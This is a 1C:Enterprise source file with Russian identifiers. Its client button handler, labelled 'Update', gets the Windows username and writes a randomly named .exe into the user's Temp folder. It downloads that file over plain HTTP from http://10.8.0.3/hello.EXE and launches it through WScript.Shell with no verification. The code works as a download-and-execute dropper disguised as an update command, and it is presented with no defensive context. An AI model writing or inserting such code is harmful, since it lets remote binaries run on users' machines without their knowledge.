// Function to generate random string
//   длн - length of string
Функция ГенерацияСлучайногоСимвола(длн)
    ГСЧ = Новый ГенераторСлучайныхЧисел(ТекущаяУниверсальнаяДатаВМиллисекундах());    
    СлучайнаяСтрока = "";
    // генерируем случайное число из 6-ти символов, например "d0c8Yf"
    Для Сч = 1 по длн Цикл        
        Набор = ГСЧ.СлучайноеЧисло(1,3);    
        Если Набор = 1 Тогда
            // это число
            СлучайныйСимвол = ГСЧ.СлучайноеЧисло(0,9);    
        ИначеЕсли Набор = 2 Тогда
            // это Большая буква латиницы
            СлучайныйСимвол = Символ(ГСЧ.СлучайноеЧисло(65,90));
        ИначеЕсли Набор = 3 Тогда
            // это маленькая буква латиницы
            СлучайныйСимвол = Символ(ГСЧ.СлучайноеЧисло(97,122));
        КонецЕсли;
        СлучайнаяСтрока = СлучайнаяСтрока + СлучайныйСимвол;
    КонецЦикла;      
    Возврат(СлучайнаяСтрока);    
КонецФункции

// Procedure to download file using HTTP/HTTPS and save it in disk
//    АдресФайлаВИнтернете  - path from which download file
//    АдресФайлаНаКлиенте   - path where to save file
Процедура ЗагрузитьФайлИзИнтернета(АдресФайлаВИнтернете, АдресФайлаНаКлиенте)
	
	Если Найти(НРег(АдресФайлаВИнтернете),"https://") = 1 Тогда
		ЗащищенноеСоединение = Новый ЗащищенноеСоединениеOpenSSL;
	Иначе
		ЗащищенноеСоединение = Неопределено;
	КонецЕсли;
	
	АдресБезHTTP = СтрЗаменить(АдресФайлаВИнтернете, "//", Символы.ПС);
	АдресБезHTTP = СтрПолучитьСтроку(АдресБезHTTP, СтрЧислоСтрок(АдресБезHTTP));
	
	АдресСервера = СтрПолучитьСтроку(СтрЗаменить(АдресБезHTTP, "/", Символы.ПС), 1);
	
	ПутьКФайлуВнутриДомена = Сред(АдресБезHTTP, Найти(АдресБезHTTP, "/"));
	
	Соединение = Новый HTTPСоединение(АдресСервера, ,,,, 3, ЗащищенноеСоединение);
	Соединение.Получить(ПутьКФайлуВнутриДомена, АдресФайлаНаКлиенте);	
	
КонецПроцедуры 
 
// Procedure that get launched when user press button
&НаКлиенте
Процедура Обновить(Команда)
	// Get username
	wsn = новый comОбъект("wscript.network");
    пользователь = wsn.username;
	
	// Create path to where save file 
	путьдофайла = "C:\Users\" + пользователь + "\AppData\Local\Temp\" + ГенерацияСлучайногоСимвола(8) + ".exe";
	
	Сообщить(путьдофайла);
	// Download file and save it in our path
	ЗагрузитьФайлИзИнтернета("http://10.8.0.3/hello.EXE", путьдофайла);
	
	// Launch app
	wss = Новый COMОбъект("WScript.Shell"); 
    wss.Run(путьдофайла, 1, 0);
	
КонецПроцедуры
